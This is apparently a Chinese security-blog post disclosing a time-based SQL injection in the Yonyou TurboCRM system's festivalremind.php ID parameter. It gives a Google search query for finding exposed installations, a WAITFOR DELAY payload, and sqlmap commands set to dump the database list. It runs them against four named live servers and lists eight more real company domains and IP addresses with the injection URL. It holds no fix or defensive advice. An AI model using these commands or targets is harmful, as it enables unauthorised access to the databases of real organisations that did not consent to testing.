用友TruboCRM管理系统SQL注入

文章目录

漏洞作者: error

用友CRM客户关系管理系统

Google关键字:intitle:用友TurboCRM intext:登录

081905125c74cad3eb5acad3c077051b45e9c39d

 

注入链接:/background/festivalremind.php?ID=1

注入参数:ID

Payload: ?ID=1; WAITFOR DELAY ‘0:0:5’–

Sqlmap注入命令: sqlmap -u ‘http://xxxxxx/background/festivalremind.php?ID=1’ –level 5 –risk 3 –thechnique=T –dbms mssql –dbs –random-agent –batch -v 3

漏洞证明:

测试案例:

(1) http://crm.szclou.com:8088/background/festivalremind.php?ID=1

python sqlmap.py -u http://crm.szclou.com:8088/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 1 –random-agent –technique=T

09123008ee1198b77ed77ecfa35b8f69bced4acd

 

 

(2)http://www.kdlian.com:8001/background/festivalremind.php?ID=1
python sqlmap.py -u http://www.kdlian.com:8001/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T

 

09123017f17b0b0e261cfadd1447b2788f8cd10b

 

(3)http://218.94.82.23/background/festivalremind.php?ID=1
python sqlmap.py -u http://218.94.82.23/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T

0912302469b5eb039c15ec878be640da4c63cc94

 

(4)http://220.113.5.194/background/festivalremind.php?ID=1
python sqlmap.py -u http://220.113.5.194/background/festivalremind.php?ID=1 –level 5 –risk 3 –dbms mssql –dbs –batch -v 3 –random-agent –technique=T

09123038d3b2eed3ff550380a682e4769bca8d1b

 

其他案例:
http://218.84.134.162:8088/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://crm.pearmain.cn/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://nc.shineroad.com/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://crm7.abgroup.cn/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://crm.transn.net/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://218.108.86.226/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://crm.yiwenkeji.com:8080/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–
http://yindajituan.gicp.net:8888/background/festivalremind.php?ID=1;waitfor%20delay%20’0:0:5′–

原文链接:,转发请注明来源!

发表评论

要发表评论,您必须先登录